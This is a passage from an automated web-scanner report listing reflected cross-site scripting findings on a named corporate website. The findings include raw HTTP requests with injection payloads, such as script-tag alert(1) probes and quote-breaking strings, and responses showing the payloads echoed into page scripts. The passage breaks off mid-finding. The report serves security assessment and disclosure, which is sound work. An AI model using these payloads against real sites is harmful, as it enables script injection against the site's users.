var request='/resources/f69fa';d46aa6d4220'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.745. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos).xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a7-111-Virtual+Tours+(Demos).xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93dba'%3b1539627f493 was submitted in the REST URL parameter 1. This input was echoed as 93dba';1539627f493 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources93dba'%3b1539627f493/1002a3a7-111-Virtual+Tours+(Demos).xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:30:15 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40676
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources93dba';1539627f493/1002a3a7-111-Virtual+Tours+(Demos).xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.746. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos).xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a7-111-Virtual+Tours+(Demos).xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 910e3"%3b195ec62a14f was submitted in the REST URL parameter 1. This input was echoed as 910e3";195ec62a14f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources910e3"%3b195ec62a14f/1002a3a7-111-Virtual+Tours+(Demos).xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:03 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40676
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources910e3";195ec62a14f/1002a3a7-111-Virtual+Tours+(Demos).xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MI
...[SNIP]...

1.747. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos).xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a7-111-Virtual+Tours+(Demos).xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8878</script><script>alert(1)</script>8ecbe35d2c3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a7-111-Virtual+Tours+(Demos).xmla8878</script><script>alert(1)</script>8ecbe35d2c3 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "21cfc08239c239bd84159626542afbf6"
Last-Modified: Wed, 17 Nov 2010 00:31:18 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:31:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d63e70ec3-4f17-4267-9890-57b910eee1ce|VTID%3da3522847-85d4-4945-8725-df4f82125a8b|SX%3d1289955078|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:35:02 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:31:18 GMT
Content-Length: 33851

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<url>/resources/1002a3a7-111-Virtual+Tours+(Demos).xmla8878</script><script>alert(1)</script>8ecbe35d2c3</url>
...[SNIP]...

1.748. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos).xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a7-111-Virtual+Tours+(Demos).xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8db7e'%3bc71501f142d was submitted in the REST URL parameter 2. This input was echoed as 8db7e';c71501f142d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/8db7e'%3bc71501f142d HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:24 GMT
Content-Type: text/html
Content-Length: 40212
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/8db7e';c71501f142d'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.749. http://www.verizonbusiness.com/resources/1002a3a8-111-White+Papers.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a8-111-White+Papers.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6cee'%3b9e5b2f0d456 was submitted in the REST URL parameter 1. This input was echoed as c6cee';9e5b2f0d456 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesc6cee'%3b9e5b2f0d456/1002a3a8-111-White+Papers.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:12 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resourcesc6cee';9e5b2f0d456/1002a3a8-111-White+Papers.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.750. http://www.verizonbusiness.com/resources/1002a3a8-111-White+Papers.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a8-111-White+Papers.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1b49"%3b9bc1af73402 was submitted in the REST URL parameter 1. This input was echoed as e1b49";9bc1af73402 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcese1b49"%3b9bc1af73402/1002a3a8-111-White+Papers.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:54 GMT
Content-Type: text/html
Content-Length: 40660
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcese1b49";9bc1af73402/1002a3a8-111-White+Papers.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.751. http://www.verizonbusiness.com/resources/1002a3a8-111-White+Papers.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a8-111-White+Papers.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f1bc</script><script>alert(1)</script>bce0008b5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a8-111-White+Papers.xml5f1bc</script><script>alert(1)</script>bce0008b5c HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "a187ef71b5868d3849248bcda99ef5f3"
Last-Modified: Wed, 17 Nov 2010 00:32:58 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:32:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3de1026a3f-781b-4cd8-a2b6-4ce08b94e4d8|VTID%3ddd9978d7-bb03-4ece-9acf-ad882f263743|SX%3d1289955178|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:36:42 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:32:58 GMT
Content-Length: 51158

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<url>/resources/1002a3a8-111-White+Papers.xml5f1bc</script><script>alert(1)</script>bce0008b5c</url>
...[SNIP]...

1.752. http://www.verizonbusiness.com/resources/1002a3a8-111-White+Papers.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a8-111-White+Papers.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d503'%3b72fd53023a5 was submitted in the REST URL parameter 2. This input was echoed as 3d503';72fd53023a5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/3d503'%3b72fd53023a5 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:00 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/3d503';72fd53023a5'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.753. http://www.verizonbusiness.com/resources/1002a3a9-111-Webinars+&+Videos.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a9-111-Webinars+&+Videos.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41131"%3b2f62563757c was submitted in the REST URL parameter 1. This input was echoed as 41131";2f62563757c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources41131"%3b2f62563757c/1002a3a9-111-Webinars+&+Videos.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:53 GMT
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources41131";2f62563757c/1002a3a9-111-Webinars+&+Videos.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMU
...[SNIP]...

1.754. http://www.verizonbusiness.com/resources/1002a3a9-111-Webinars+&+Videos.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a9-111-Webinars+&+Videos.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd48e'%3b2960239fba1 was submitted in the REST URL parameter 1. This input was echoed as cd48e';2960239fba1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcescd48e'%3b2960239fba1/1002a3a9-111-Webinars+&+Videos.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:09 GMT
Content-Type: text/html
Content-Length: 40668
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resourcescd48e';2960239fba1/1002a3a9-111-Webinars+&+Videos.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.755. http://www.verizonbusiness.com/resources/1002a3a9-111-Webinars+&+Videos.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a9-111-Webinars+&+Videos.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71ecb</script><script>alert(1)</script>b9ec17c16f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a9-111-Webinars+71ecb</script><script>alert(1)</script>b9ec17c16f3&+Videos.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 17 Nov 2010 00:31:14 GMT
Server: Roxen/4.5.146-release3
ETag: "1e4196c6494c575fa81d01b257d3c42a"
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:31:14 GMT
Connection: close
Connection: Transfer-Encoding
Expires: Mon, 16 Nov 2009 18:31:14 GMT
Content-Length: 47303

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<url>/resources/1002a3a9-111-Webinars+71ecb</script><script>alert(1)</script>b9ec17c16f3&+Videos.xml</url>
...[SNIP]...

1.756. http://www.verizonbusiness.com/resources/1002a3a9-111-Webinars+&+Videos.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a9-111-Webinars+&+Videos.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75ac2'%3b78d1b53f805 was submitted in the REST URL parameter 2. This input was echoed as 75ac2';78d1b53f805 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/75ac2'%3b78d1b53f805&+Videos.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:31:28 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40234
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/75ac2';78d1b53f805&+Videos.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.757. http://www.verizonbusiness.com/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be033"%3b75616d7df24 was submitted in the REST URL parameter 1. This input was echoed as be033";75616d7df24 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesbe033"%3b75616d7df24/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40724
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

